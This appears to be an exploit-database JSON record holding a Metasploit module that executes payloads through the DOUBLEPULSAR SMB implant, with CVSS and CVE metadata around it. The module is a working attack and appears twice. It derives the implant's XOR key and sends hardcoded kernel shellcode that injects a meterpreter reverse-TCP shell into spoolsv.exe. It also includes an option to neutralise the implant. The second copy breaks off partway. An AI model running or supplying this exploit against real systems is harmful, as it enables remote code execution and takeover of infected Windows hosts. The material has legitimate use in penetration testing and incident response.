true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-26] #"}, "lastseen": "2021-09-26T00:16:00", "differentElements": ["sourceData"], "edition": 26}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "5f36a4a9bdda15cb6ef4c36df7daa9e7", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-26T22:18:45", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-26T00:16:00", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-26T00:16:00", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - 